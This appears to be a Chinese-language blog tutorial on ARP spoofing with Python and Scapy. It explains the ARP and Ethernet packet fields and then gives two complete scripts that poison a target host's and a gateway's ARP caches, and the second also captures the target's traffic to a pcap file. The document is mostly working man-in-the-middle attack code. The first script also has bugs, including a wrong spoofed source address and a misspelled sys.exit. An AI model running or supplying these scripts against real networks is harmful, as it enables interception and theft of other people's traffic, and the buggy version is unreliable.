python arp欺骗

ls(ARP())
hwtype     : XShortField                         = 1               ('1')
ptype      : XShortEnumField                     = 2048            ('2048')
hwlen      : FieldLenField                       = None            ('None')
plen       : FieldLenField                       = None            ('None')
op         : ShortEnumField                      = 1               ('1')
hwsrc      : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc       : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst      : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst       : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0'       ('None')
>>>
op操作码：默认1,取值1或2,分别代表ARP请求包或响应包（请求操作或响应操作）
hwsrc:发送方MAC地址，用于告诉对方我的MAC地址是什么，默认为本机，所以可以忽略此属性
psrc:发送方IP地址，用于告诉对方我的IP地址是什么 ，可用来伪装
这报文发给谁，由下面的两个属性决定：
hwdst: 对方的MAC地址
pdst:对方的IP地址

ls(Ether())
dst        : DestMACField                        = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src        : SourceMACField                      = 'dc:a6:32:bb:49:9d' ('None')
type       : XShortEnumField                     = 36864           ('36864')
>>>
构造ARP包：
欺骗目标主机，我的是网关：
发送给目标 主机

import sys,time
from scapy.all import *
from optparse import OptionParser
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    #ARP缓冲表恢复
    print("[*]恢复ARP缓冲。。。")
    #hwdst="ff:ff:ff:ff:ff:ff"表示以广播的形式发送
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac))    
    pass

def attact_target(gateway_ip,gateway_mac,target_ip,target_mac):
    poison_target=ARP()
    poison_target.op=2
    poison_target.psrc=gateway_ip
    poison_target.pdst=target_ip
    poison_target.hwdst=target_mac
    #欺骗网关，我是目标主机 发给网关gateway_ip,欺骗它，我的IP是target_ip
    poison_gateway=ARP()
    poison_gateway.op=2
    poison_gateway.psrc=gateway_ip
    poison_gateway.pdst=gateway_ip
    poison_gateway.hwdst=gateway_mac
    print("[]正在进行投毒[CTRL+C结束「")
    while 1:
        try:
            #循环发送ARP包
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
            break
    print("[*]ARP投毒结束")
def main():
    usage='sudo python3 arpspoof [-i interface] [-g gateway] host'
    parser=OptionParser(usage)
    parser.add_option('-i',dest="interface",type='string',help='网卡')
    parser.add_option('-g',dest='gateway',type='string',help='网关')
    (options,args)=parser.parse_args()
    if len(args)!=1 or options.interface is None or options.gateway is None:
        parser.print_help()
        sys.exit(0)
    interface=options.interface #网卡"wlan0"
    gateway_ip=options.gateway #网关"192.168.1.1"
    target_ip="192.168.1.254"
    conf.iface=interface
    conf.verb=0
    gateway_mac=getmacbyip(gateway_ip)
    if gateway_mac is None:
        print("mac获取失败")
        sys.eixt(0)
    else:
        print(gateway_ip,gateway_mac)
    target_mac=getmacbyip(target_ip)
    #target_mac=getmacbyip(target_ip)
    if target_mac is None:
        print("获取目标MAC失败")
    else:
        print("目标主机：%s MAC:%s" % (target_ip,target_mac))
    attact_target(gateway_ip,gateway_mac,target_ip,target_mac)
    
main()

 

from scapy.all import *
import os
import sys
import threading
import signal
 
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    #以下代码中调用send函数的方式稍有不同
    print("[*] Restoring target... ")
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    #发送退出信号到主线程
    os.kill(os.getpid(),signal.SIGINT)
 
def get_mac(ip_address):
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    #返回从响应数据中获取的Mac地址
    for s,r in responses:
        return r[Ether].src
    return None
 
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
 
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac
    print("[*] Beginning the ARP poison. [CTRL-C to stop]")
 
    while True:
        try:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    print("[*] ARP poison attack finished. ")
    return
 
interface = "wlan0"
target_ip ="192.168.1.254"
#被攻击主机
gateway_ip = "192.168.1.1"
#网关
packet_count = 1000
#攻击次数
 
#设置嗅探的网卡
conf.iface = interface
 
#关闭输出
conf.verb = 0
 
print("[*] Setting up %s" % (interface))
#print("目标主机：%s MAC:%s" % (target_ip,target_mac))
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC.  Exiting. ")
    sys.exit(0)
else:
    print("[*] Gateway %s is at %s"%(gateway_ip,gateway_mac))
 
target_mac = get_mac(target_ip)
 
if target_mac is None:
    print("[!!!] Failed to get target MAC.  Exiting. ")
    sys.exit(0)
else:
    print("[*] Target %s is at %s"%(target_ip,target_mac))
 
#启动ARP投毒攻击
poison_thread = threading.Thread(target=poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()
 
try:
    print("[*] Starting sniffer for %d packets" % (packet_count))
    bpf_filter = "ip host %s"%target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
 
    #将捕获到的数据包输出到文件
    wrpcap('arper.pcap',packets)
    #还原网络配置
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
    #还原网络配置
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)